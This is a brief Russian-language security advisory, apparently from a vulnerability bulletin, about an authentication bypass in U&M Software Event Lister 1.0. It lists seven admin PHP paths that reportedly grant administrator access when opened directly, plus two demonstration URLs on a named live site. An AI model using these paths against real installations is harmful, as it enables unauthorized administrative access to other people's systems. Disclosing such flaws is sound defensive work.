Программа: U&M Software Event Lister 1.0
Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки, позволяющей
обойти механизм аутентификации и войти в систему с правами администратора.
Эксплоит:
Используйте один из следующих путей для входа с правами администратора.
http://localhost/[path]/admin/start.php
http://localhost/[path]/admin/aktivitet.php
http://localhost/[path]/admin/prop_aktivitet.php
http://localhost/[path]/admin/kategorier.php
http://localhost/[path]/admin/konfig.php
http://localhost/[path]/admin/security.php
http://localhost/[path]/admin/manual.php
Демонстрация:
http://www.justlistit.uochm.com/demo/admin/start.php
http://www.justlistit.uochm.com/demo/admin/index.php
